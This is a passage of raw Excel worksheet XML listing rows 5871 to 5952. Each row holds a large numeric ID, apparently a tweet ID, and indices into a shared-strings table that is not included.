      <c r="C5871" t="s">
        <v>1</v>
      </c>
      <c r="D5871" t="s">
        <v>14398</v>
      </c>
      <c r="E5871" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5872">
        <v>1.2337443539962601E+18</v>
      </c>
      <c r="B5872" t="s">
        <v>14399</v>
      </c>
      <c r="C5872" t="s">
        <v>1</v>
      </c>
      <c r="D5872" t="s">
        <v>3652</v>
      </c>
      <c r="E5872" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="5873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5873">
        <v>1.23374390299953E+18</v>
      </c>
      <c r="B5873" t="s">
        <v>14400</v>
      </c>
      <c r="C5873" t="s">
        <v>1</v>
      </c>
      <c r="D5873" t="s">
        <v>14401</v>
      </c>
      <c r="E5873" t="s">
        <v>14402</v>
      </c>
    </row>
    <row r="5874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5874">
        <v>1.2337437421982999E+18</v>
      </c>
      <c r="B5874" t="s">
        <v>14403</v>
      </c>
      <c r="C5874" t="s">
        <v>1</v>
      </c>
      <c r="D5874" t="s">
        <v>14404</v>
      </c>
      <c r="E5874" t="s">
        <v>7523</v>
      </c>
    </row>
    <row r="5875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5875">
        <v>1.2337436199677E+18</v>
      </c>
      <c r="B5875" t="s">
        <v>14405</v>
      </c>
      <c r="C5875" t="s">
        <v>1</v>
      </c>
      <c r="D5875" t="s">
        <v>14406</v>
      </c>
      <c r="E5875" t="s">
        <v>14407</v>
      </c>
    </row>
    <row r="5876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5876">
        <v>1.2337434022163599E+18</v>
      </c>
      <c r="B5876" t="s">
        <v>14408</v>
      </c>
      <c r="C5876" t="s">
        <v>1</v>
      </c>
      <c r="D5876" t="s">
        <v>14409</v>
      </c>
      <c r="E5876" t="s">
        <v>6592</v>
      </c>
    </row>
    <row r="5877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5877">
        <v>1.2337433244540301E+18</v>
      </c>
      <c r="B5877" t="s">
        <v>14410</v>
      </c>
      <c r="C5877" t="s">
        <v>1</v>
      </c>
      <c r="D5877" t="s">
        <v>14411</v>
      </c>
      <c r="E5877" t="s">
        <v>14412</v>
      </c>
    </row>
    <row r="5878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5878">
        <v>1.23374165312017E+18</v>
      </c>
      <c r="B5878" t="s">
        <v>14413</v>
      </c>
      <c r="C5878" t="s">
        <v>1</v>
      </c>
      <c r="D5878" t="s">
        <v>14414</v>
      </c>
      <c r="E5878" t="s">
        <v>2844</v>
      </c>
    </row>
    <row r="5879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5879">
        <v>1.2337411040985201E+18</v>
      </c>
      <c r="B5879" t="s">
        <v>14415</v>
      </c>
      <c r="C5879" t="s">
        <v>1</v>
      </c>
      <c r="D5879" t="s">
        <v>14416</v>
      </c>
      <c r="E5879" t="s">
        <v>14417</v>
      </c>
    </row>
    <row r="5880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5880">
        <v>1.2337396973373499E+18</v>
      </c>
      <c r="B5880" t="s">
        <v>14418</v>
      </c>
      <c r="C5880" t="s">
        <v>1</v>
      </c>
      <c r="D5880" t="s">
        <v>14419</v>
      </c>
      <c r="E5880" t="s">
        <v>11994</v>
      </c>
    </row>
    <row r="5881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5881">
        <v>1.2337390638967401E+18</v>
      </c>
      <c r="B5881" t="s">
        <v>14420</v>
      </c>
      <c r="C5881" t="s">
        <v>1</v>
      </c>
      <c r="D5881" t="s">
        <v>14421</v>
      </c>
      <c r="E5881" t="s">
        <v>14422</v>
      </c>
    </row>
    <row r="5882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5882">
        <v>1.2337388699269601E+18</v>
      </c>
      <c r="B5882" t="s">
        <v>14423</v>
      </c>
      <c r="C5882" t="s">
        <v>1</v>
      </c>
      <c r="D5882" t="s">
        <v>14424</v>
      </c>
      <c r="E5882" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5883">
        <v>1.2337388102127201E+18</v>
      </c>
      <c r="B5883" t="s">
        <v>14425</v>
      </c>
      <c r="C5883" t="s">
        <v>1</v>
      </c>
      <c r="D5883" t="s">
        <v>14426</v>
      </c>
      <c r="E5883" t="s">
        <v>14427</v>
      </c>
    </row>
    <row r="5884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5884">
        <v>1.23373831775091E+18</v>
      </c>
      <c r="B5884" t="s">
        <v>14428</v>
      </c>
      <c r="C5884" t="s">
        <v>1</v>
      </c>
      <c r="D5884" t="s">
        <v>14429</v>
      </c>
      <c r="E5884" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5885">
        <v>1.2337366820352599E+18</v>
      </c>
      <c r="B5885" t="s">
        <v>14431</v>
      </c>
      <c r="C5885" t="s">
        <v>1</v>
      </c>
      <c r="D5885" t="s">
        <v>14432</v>
      </c>
      <c r="E5885" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5886">
        <v>1.2337356167533599E+18</v>
      </c>
      <c r="B5886" t="s">
        <v>14433</v>
      </c>
      <c r="C5886" t="s">
        <v>1</v>
      </c>
      <c r="D5886" t="s">
        <v>14434</v>
      </c>
      <c r="E5886" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5887">
        <v>1.2337350682308301E+18</v>
      </c>
      <c r="B5887" t="s">
        <v>14435</v>
      </c>
      <c r="C5887" t="s">
        <v>1</v>
      </c>
      <c r="D5887" t="s">
        <v>14436</v>
      </c>
      <c r="E5887" t="s">
        <v>14437</v>
      </c>
    </row>
    <row r="5888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5888">
        <v>1.2337349276461E+18</v>
      </c>
      <c r="B5888" t="s">
        <v>14438</v>
      </c>
      <c r="C5888" t="s">
        <v>1</v>
      </c>
      <c r="D5888" t="s">
        <v>14439</v>
      </c>
      <c r="E5888" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="5889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5889">
        <v>1.2337347181363799E+18</v>
      </c>
      <c r="B5889" t="s">
        <v>14440</v>
      </c>
      <c r="C5889" t="s">
        <v>1</v>
      </c>
      <c r="D5889" t="s">
        <v>14441</v>
      </c>
      <c r="E5889" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="5890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5890">
        <v>1.23373451534608E+18</v>
      </c>
      <c r="B5890" t="s">
        <v>14442</v>
      </c>
      <c r="C5890" t="s">
        <v>1</v>
      </c>
      <c r="D5890" t="s">
        <v>14443</v>
      </c>
      <c r="E5890" t="s">
        <v>14444</v>
      </c>
    </row>
    <row r="5891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5891">
        <v>1.23373422145521E+18</v>
      </c>
      <c r="B5891" t="s">
        <v>14445</v>
      </c>
      <c r="C5891" t="s">
        <v>1</v>
      </c>
      <c r="D5891" t="s">
        <v>14446</v>
      </c>
      <c r="E5891" t="s">
        <v>14447</v>
      </c>
    </row>
    <row r="5892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5892">
        <v>1.2337341602101601E+18</v>
      </c>
      <c r="B5892" t="s">
        <v>14448</v>
      </c>
      <c r="C5892" t="s">
        <v>1</v>
      </c>
      <c r="D5892" t="s">
        <v>14449</v>
      </c>
      <c r="E5892" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="5893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5893">
        <v>1.23373415778995E+18</v>
      </c>
      <c r="B5893" t="s">
        <v>14451</v>
      </c>
      <c r="C5893" t="s">
        <v>1</v>
      </c>
      <c r="D5893" t="s">
        <v>14452</v>
      </c>
      <c r="E5893" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="5894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5894">
        <v>1.23373401752832E+18</v>
      </c>
      <c r="B5894" t="s">
        <v>14453</v>
      </c>
      <c r="C5894" t="s">
        <v>1</v>
      </c>
      <c r="D5894" t="s">
        <v>14454</v>
      </c>
      <c r="E5894" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="5895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5895">
        <v>1.2337340064637E+18</v>
      </c>
      <c r="B5895" t="s">
        <v>14455</v>
      </c>
      <c r="C5895" t="s">
        <v>1</v>
      </c>
      <c r="D5895" t="s">
        <v>14456</v>
      </c>
      <c r="E5895" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="5896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5896">
        <v>1.23373319778915E+18</v>
      </c>
      <c r="B5896" t="s">
        <v>14457</v>
      </c>
      <c r="C5896" t="s">
        <v>1</v>
      </c>
      <c r="D5896" t="s">
        <v>14458</v>
      </c>
      <c r="E5896" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5897">
        <v>1.23373312477055E+18</v>
      </c>
      <c r="B5897" t="s">
        <v>14459</v>
      </c>
      <c r="C5897" t="s">
        <v>1</v>
      </c>
      <c r="D5897" t="s">
        <v>14460</v>
      </c>
      <c r="E5897" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5898">
        <v>1.2337330610674601E+18</v>
      </c>
      <c r="B5898" t="s">
        <v>14461</v>
      </c>
      <c r="C5898" t="s">
        <v>1</v>
      </c>
      <c r="D5898" t="s">
        <v>14462</v>
      </c>
      <c r="E5898" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5899">
        <v>1.2337329900075599E+18</v>
      </c>
      <c r="B5899" t="s">
        <v>14463</v>
      </c>
      <c r="C5899" t="s">
        <v>1</v>
      </c>
      <c r="D5899" t="s">
        <v>14464</v>
      </c>
      <c r="E5899" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5900">
        <v>1.23373292265537E+18</v>
      </c>
      <c r="B5900" t="s">
        <v>14465</v>
      </c>
      <c r="C5900" t="s">
        <v>1</v>
      </c>
      <c r="D5900" t="s">
        <v>14466</v>
      </c>
      <c r="E5900" t="s">
        <v>14430</v>
      </c>
    </row>
    <row r="5901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5901">
        <v>1.2337325553057101E+18</v>
      </c>
      <c r="B5901" t="s">
        <v>14467</v>
      </c>
      <c r="C5901" t="s">
        <v>1</v>
      </c>
      <c r="D5901" t="s">
        <v>14468</v>
      </c>
      <c r="E5901" t="s">
        <v>6821</v>
      </c>
    </row>
    <row r="5902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5902">
        <v>1.23373240909664E+18</v>
      </c>
      <c r="B5902" t="s">
        <v>14469</v>
      </c>
      <c r="C5902" t="s">
        <v>1</v>
      </c>
      <c r="D5902" t="s">
        <v>14470</v>
      </c>
      <c r="E5902" t="s">
        <v>14471</v>
      </c>
    </row>
    <row r="5903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5903">
        <v>1.2337322600772201E+18</v>
      </c>
      <c r="B5903" t="s">
        <v>14472</v>
      </c>
      <c r="C5903" t="s">
        <v>1</v>
      </c>
      <c r="D5903" t="s">
        <v>14473</v>
      </c>
      <c r="E5903" t="s">
        <v>14474</v>
      </c>
    </row>
    <row r="5904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5904">
        <v>1.23373156688029E+18</v>
      </c>
      <c r="B5904" t="s">
        <v>14475</v>
      </c>
      <c r="C5904" t="s">
        <v>1</v>
      </c>
      <c r="D5904" t="s">
        <v>14476</v>
      </c>
      <c r="E5904" t="s">
        <v>14477</v>
      </c>
    </row>
    <row r="5905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5905">
        <v>1.23373119136018E+18</v>
      </c>
      <c r="B5905" t="s">
        <v>14478</v>
      </c>
      <c r="C5905" t="s">
        <v>1</v>
      </c>
      <c r="D5905" t="s">
        <v>14479</v>
      </c>
      <c r="E5905" t="s">
        <v>14480</v>
      </c>
    </row>
    <row r="5906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5906">
        <v>1.2337282679512399E+18</v>
      </c>
      <c r="B5906" t="s">
        <v>14481</v>
      </c>
      <c r="C5906" t="s">
        <v>1</v>
      </c>
      <c r="D5906" t="s">
        <v>14482</v>
      </c>
      <c r="E5906" t="s">
        <v>14483</v>
      </c>
    </row>
    <row r="5907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5907">
        <v>1.2337276699441101E+18</v>
      </c>
      <c r="B5907" t="s">
        <v>14484</v>
      </c>
      <c r="C5907" t="s">
        <v>1</v>
      </c>
      <c r="D5907" t="s">
        <v>14485</v>
      </c>
      <c r="E5907" t="s">
        <v>14486</v>
      </c>
    </row>
    <row r="5908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5908">
        <v>1.23372744822065E+18</v>
      </c>
      <c r="B5908" t="s">
        <v>14487</v>
      </c>
      <c r="C5908" t="s">
        <v>1</v>
      </c>
      <c r="D5908" t="s">
        <v>14488</v>
      </c>
      <c r="E5908" t="s">
        <v>6315</v>
      </c>
    </row>
    <row r="5909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5909">
        <v>1.23372730582813E+18</v>
      </c>
      <c r="B5909" t="s">
        <v>14489</v>
      </c>
      <c r="C5909" t="s">
        <v>1</v>
      </c>
      <c r="D5909" t="s">
        <v>14490</v>
      </c>
      <c r="E5909" t="s">
        <v>14491</v>
      </c>
    </row>
    <row r="5910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5910">
        <v>1.2337266108696E+18</v>
      </c>
      <c r="B5910" t="s">
        <v>14492</v>
      </c>
      <c r="C5910" t="s">
        <v>1</v>
      </c>
      <c r="D5910" t="s">
        <v>14493</v>
      </c>
      <c r="E5910" t="s">
        <v>14494</v>
      </c>
    </row>
    <row r="5911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5911">
        <v>1.2337261968919501E+18</v>
      </c>
      <c r="B5911" t="s">
        <v>14495</v>
      </c>
      <c r="C5911" t="s">
        <v>1</v>
      </c>
      <c r="D5911" t="s">
        <v>14496</v>
      </c>
      <c r="E5911" t="s">
        <v>14497</v>
      </c>
    </row>
    <row r="5912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5912">
        <v>1.23372566336385E+18</v>
      </c>
      <c r="B5912" t="s">
        <v>14498</v>
      </c>
      <c r="C5912" t="s">
        <v>1</v>
      </c>
      <c r="D5912" t="s">
        <v>14499</v>
      </c>
      <c r="E5912" t="s">
        <v>14500</v>
      </c>
    </row>
    <row r="5913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5913">
        <v>1.23372556103134E+18</v>
      </c>
      <c r="B5913" t="s">
        <v>14501</v>
      </c>
      <c r="C5913" t="s">
        <v>1</v>
      </c>
      <c r="D5913" t="s">
        <v>14502</v>
      </c>
      <c r="E5913" t="s">
        <v>14503</v>
      </c>
    </row>
    <row r="5914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5914">
        <v>1.2337253972479401E+18</v>
      </c>
      <c r="B5914" t="s">
        <v>14504</v>
      </c>
      <c r="C5914" t="s">
        <v>1</v>
      </c>
      <c r="D5914" t="s">
        <v>14505</v>
      </c>
      <c r="E5914" t="s">
        <v>14506</v>
      </c>
    </row>
    <row r="5915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5915">
        <v>1.2337249592157499E+18</v>
      </c>
      <c r="B5915" t="s">
        <v>14507</v>
      </c>
      <c r="C5915" t="s">
        <v>1</v>
      </c>
      <c r="D5915" t="s">
        <v>14508</v>
      </c>
      <c r="E5915" t="s">
        <v>14509</v>
      </c>
    </row>
    <row r="5916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5916">
        <v>1.23372392777775E+18</v>
      </c>
      <c r="B5916" t="s">
        <v>14510</v>
      </c>
      <c r="C5916" t="s">
        <v>1</v>
      </c>
      <c r="D5916" t="s">
        <v>14511</v>
      </c>
      <c r="E5916" t="s">
        <v>14512</v>
      </c>
    </row>
    <row r="5917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5917">
        <v>1.2337238946594701E+18</v>
      </c>
      <c r="B5917" t="s">
        <v>14513</v>
      </c>
      <c r="C5917" t="s">
        <v>1</v>
      </c>
      <c r="D5917" t="s">
        <v>14514</v>
      </c>
      <c r="E5917" t="s">
        <v>14515</v>
      </c>
    </row>
    <row r="5918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5918">
        <v>1.2337236994775099E+18</v>
      </c>
      <c r="B5918" t="s">
        <v>14516</v>
      </c>
      <c r="C5918" t="s">
        <v>1</v>
      </c>
      <c r="D5918" t="s">
        <v>14517</v>
      </c>
      <c r="E5918" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="5919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5919">
        <v>1.23372362120766E+18</v>
      </c>
      <c r="B5919" t="s">
        <v>14518</v>
      </c>
      <c r="C5919" t="s">
        <v>1</v>
      </c>
      <c r="D5919" t="s">
        <v>14519</v>
      </c>
      <c r="E5919" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5920">
        <v>1.23372356734861E+18</v>
      </c>
      <c r="B5920" t="s">
        <v>14520</v>
      </c>
      <c r="C5920" t="s">
        <v>1</v>
      </c>
      <c r="D5920" t="s">
        <v>14521</v>
      </c>
      <c r="E5920" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5921">
        <v>1.2337223546956401E+18</v>
      </c>
      <c r="B5921" t="s">
        <v>14522</v>
      </c>
      <c r="C5921" t="s">
        <v>1</v>
      </c>
      <c r="D5921" t="s">
        <v>14523</v>
      </c>
      <c r="E5921" t="s">
        <v>14524</v>
      </c>
    </row>
    <row r="5922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5922">
        <v>1.23371982852915E+18</v>
      </c>
      <c r="B5922" t="s">
        <v>14525</v>
      </c>
      <c r="C5922" t="s">
        <v>1</v>
      </c>
      <c r="D5922" t="s">
        <v>14526</v>
      </c>
      <c r="E5922" t="s">
        <v>14273</v>
      </c>
    </row>
    <row r="5923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5923">
        <v>1.2337196796146801E+18</v>
      </c>
      <c r="B5923" t="s">
        <v>14527</v>
      </c>
      <c r="C5923" t="s">
        <v>1</v>
      </c>
      <c r="D5923" t="s">
        <v>14528</v>
      </c>
      <c r="E5923" t="s">
        <v>14529</v>
      </c>
    </row>
    <row r="5924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5924">
        <v>1.2337179232708401E+18</v>
      </c>
      <c r="B5924" t="s">
        <v>14530</v>
      </c>
      <c r="C5924" t="s">
        <v>1</v>
      </c>
      <c r="D5924" t="s">
        <v>14531</v>
      </c>
      <c r="E5924" t="s">
        <v>14532</v>
      </c>
    </row>
    <row r="5925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5925">
        <v>1.23371532318819E+18</v>
      </c>
      <c r="B5925" t="s">
        <v>14533</v>
      </c>
      <c r="C5925" t="s">
        <v>1</v>
      </c>
      <c r="D5925" t="s">
        <v>2014</v>
      </c>
      <c r="E5925" t="s">
        <v>2015</v>
      </c>
    </row>
    <row r="5926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5926">
        <v>1.2337152703903601E+18</v>
      </c>
      <c r="B5926" t="s">
        <v>14534</v>
      </c>
      <c r="C5926" t="s">
        <v>1</v>
      </c>
      <c r="D5926" t="s">
        <v>14535</v>
      </c>
      <c r="E5926" t="s">
        <v>6601</v>
      </c>
    </row>
    <row r="5927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5927">
        <v>1.23371485748622E+18</v>
      </c>
      <c r="B5927" t="s">
        <v>14536</v>
      </c>
      <c r="C5927" t="s">
        <v>1</v>
      </c>
      <c r="D5927" t="s">
        <v>14537</v>
      </c>
      <c r="E5927" t="s">
        <v>14538</v>
      </c>
    </row>
    <row r="5928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5928">
        <v>1.2337125375999501E+18</v>
      </c>
      <c r="B5928" t="s">
        <v>14539</v>
      </c>
      <c r="C5928" t="s">
        <v>1</v>
      </c>
      <c r="D5928" t="s">
        <v>14540</v>
      </c>
      <c r="E5928" t="s">
        <v>14506</v>
      </c>
    </row>
    <row r="5929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5929">
        <v>1.2337123137164201E+18</v>
      </c>
      <c r="B5929" t="s">
        <v>14541</v>
      </c>
      <c r="C5929" t="s">
        <v>1</v>
      </c>
      <c r="D5929" t="s">
        <v>14542</v>
      </c>
      <c r="E5929" t="s">
        <v>14543</v>
      </c>
    </row>
    <row r="5930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5930">
        <v>1.2337101003821199E+18</v>
      </c>
      <c r="B5930" t="s">
        <v>14544</v>
      </c>
      <c r="C5930" t="s">
        <v>1</v>
      </c>
      <c r="D5930" t="s">
        <v>14545</v>
      </c>
      <c r="E5930" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="5931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5931">
        <v>1.23370859335616E+18</v>
      </c>
      <c r="B5931" t="s">
        <v>14546</v>
      </c>
      <c r="C5931" t="s">
        <v>1</v>
      </c>
      <c r="D5931" t="s">
        <v>14547</v>
      </c>
      <c r="E5931" t="s">
        <v>14548</v>
      </c>
    </row>
    <row r="5932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5932">
        <v>1.2337083718381E+18</v>
      </c>
      <c r="B5932" t="s">
        <v>14549</v>
      </c>
      <c r="C5932" t="s">
        <v>1</v>
      </c>
      <c r="D5932" t="s">
        <v>14550</v>
      </c>
      <c r="E5932" t="s">
        <v>4864</v>
      </c>
    </row>
    <row r="5933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5933">
        <v>1.2337065416955899E+18</v>
      </c>
      <c r="B5933" t="s">
        <v>14551</v>
      </c>
      <c r="C5933" t="s">
        <v>1</v>
      </c>
      <c r="D5933" t="s">
        <v>14552</v>
      </c>
      <c r="E5933" t="s">
        <v>492</v>
      </c>
    </row>
    <row r="5934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5934">
        <v>1.23370494141342E+18</v>
      </c>
      <c r="B5934" t="s">
        <v>14553</v>
      </c>
      <c r="C5934" t="s">
        <v>1</v>
      </c>
      <c r="D5934" t="s">
        <v>14554</v>
      </c>
      <c r="E5934" t="s">
        <v>14555</v>
      </c>
    </row>
    <row r="5935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5935">
        <v>1.2337046696601101E+18</v>
      </c>
      <c r="B5935" t="s">
        <v>14556</v>
      </c>
      <c r="C5935" t="s">
        <v>1</v>
      </c>
      <c r="D5935" t="s">
        <v>14557</v>
      </c>
      <c r="E5935" t="s">
        <v>14558</v>
      </c>
    </row>
    <row r="5936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5936">
        <v>1.2337044976978601E+18</v>
      </c>
      <c r="B5936" t="s">
        <v>14559</v>
      </c>
      <c r="C5936" t="s">
        <v>1</v>
      </c>
      <c r="D5936" t="s">
        <v>14560</v>
      </c>
      <c r="E5936" t="s">
        <v>14561</v>
      </c>
    </row>
    <row r="5937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5937">
        <v>1.2337044179600901E+18</v>
      </c>
      <c r="B5937" t="s">
        <v>14562</v>
      </c>
      <c r="C5937" t="s">
        <v>1</v>
      </c>
      <c r="D5937" t="s">
        <v>14563</v>
      </c>
      <c r="E5937" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="5938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5938">
        <v>1.2337043786552901E+18</v>
      </c>
      <c r="B5938" t="s">
        <v>14565</v>
      </c>
      <c r="C5938" t="s">
        <v>1</v>
      </c>
      <c r="D5938" t="s">
        <v>14566</v>
      </c>
      <c r="E5938" t="s">
        <v>14567</v>
      </c>
    </row>
    <row r="5939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5939">
        <v>1.2337042890355899E+18</v>
      </c>
      <c r="B5939" t="s">
        <v>14568</v>
      </c>
      <c r="C5939" t="s">
        <v>1</v>
      </c>
      <c r="D5939" t="s">
        <v>14569</v>
      </c>
      <c r="E5939" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="5940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5940">
        <v>1.23370409770815E+18</v>
      </c>
      <c r="B5940" t="s">
        <v>14570</v>
      </c>
      <c r="C5940" t="s">
        <v>1</v>
      </c>
      <c r="D5940" t="s">
        <v>14571</v>
      </c>
      <c r="E5940" t="s">
        <v>3294</v>
      </c>
    </row>
    <row r="5941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5941">
        <v>1.2337039923556201E+18</v>
      </c>
      <c r="B5941" t="s">
        <v>14572</v>
      </c>
      <c r="C5941" t="s">
        <v>1</v>
      </c>
      <c r="D5941" t="s">
        <v>14573</v>
      </c>
      <c r="E5941" t="s">
        <v>3294</v>
      </c>
    </row>
    <row r="5942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5942">
        <v>1.23370395034128E+18</v>
      </c>
      <c r="B5942" t="s">
        <v>14574</v>
      </c>
      <c r="C5942" t="s">
        <v>1</v>
      </c>
      <c r="D5942" t="s">
        <v>14575</v>
      </c>
      <c r="E5942" t="s">
        <v>3294</v>
      </c>
    </row>
    <row r="5943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5943">
        <v>1.2337028715579E+18</v>
      </c>
      <c r="B5943" t="s">
        <v>14576</v>
      </c>
      <c r="C5943" t="s">
        <v>1</v>
      </c>
      <c r="D5943" t="s">
        <v>14577</v>
      </c>
      <c r="E5943" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="5944" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5944">
        <v>1.23370030423283E+18</v>
      </c>
      <c r="B5944" t="s">
        <v>14578</v>
      </c>
      <c r="C5944" t="s">
        <v>1</v>
      </c>
      <c r="D5944" t="s">
        <v>14579</v>
      </c>
      <c r="E5944" t="s">
        <v>14580</v>
      </c>
    </row>
    <row r="5945" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5945">
        <v>1.2336998722405399E+18</v>
      </c>
      <c r="B5945" t="s">
        <v>14581</v>
      </c>
      <c r="C5945" t="s">
        <v>1</v>
      </c>
      <c r="D5945" t="s">
        <v>14582</v>
      </c>
      <c r="E5945" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5946" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5946">
        <v>1.23369913257073E+18</v>
      </c>
      <c r="B5946" t="s">
        <v>14583</v>
      </c>
      <c r="C5946" t="s">
        <v>1</v>
      </c>
      <c r="D5946" t="s">
        <v>14584</v>
      </c>
      <c r="E5946" t="s">
        <v>14585</v>
      </c>
    </row>
    <row r="5947" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5947">
        <v>1.2336991250922199E+18</v>
      </c>
      <c r="B5947" t="s">
        <v>14586</v>
      </c>
      <c r="C5947" t="s">
        <v>1</v>
      </c>
      <c r="D5947" t="s">
        <v>14587</v>
      </c>
      <c r="E5947" t="s">
        <v>14588</v>
      </c>
    </row>
    <row r="5948" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5948">
        <v>1.2336969877671401E+18</v>
      </c>
      <c r="B5948" t="s">
        <v>14589</v>
      </c>
      <c r="C5948" t="s">
        <v>1</v>
      </c>
      <c r="D5948" t="s">
        <v>14590</v>
      </c>
      <c r="E5948" t="s">
        <v>14591</v>
      </c>
    </row>
    <row r="5949" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5949">
        <v>1.23369677538035E+18</v>
      </c>
      <c r="B5949" t="s">
        <v>14592</v>
      </c>
      <c r="C5949" t="s">
        <v>1</v>
      </c>
      <c r="D5949" t="s">
        <v>14593</v>
      </c>
      <c r="E5949" t="s">
        <v>14594</v>
      </c>
    </row>
    <row r="5950" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5950">
        <v>1.23369671991907E+18</v>
      </c>
      <c r="B5950" t="s">
        <v>14595</v>
      </c>
      <c r="C5950" t="s">
        <v>1</v>
      </c>
      <c r="D5950" t="s">
        <v>14596</v>
      </c>
      <c r="E5950" t="s">
        <v>14597</v>
      </c>
    </row>
    <row r="5951" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5951">
        <v>1.23369615242974E+18</v>
      </c>
      <c r="B5951" t="s">
        <v>14598</v>
      </c>
      <c r="C5951" t="s">
        <v>1</v>
      </c>
      <c r="D5951" t="s">
        <v>14599</v>
      </c>
      <c r="E5951" t="s">
        <v>14600</v>
      </c>
    </row>
    <row r="5952" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5952">
        <v>1.23369353775091E+18</v>
      </c>
      <c r="B5952" t="s">
        <v>14601</v>
      </c>
      <c r="C5952" t="s">
        <v>1</v>
      </c>
      <c r="D5952" t="s">
        <v>14602</v>
      </c>
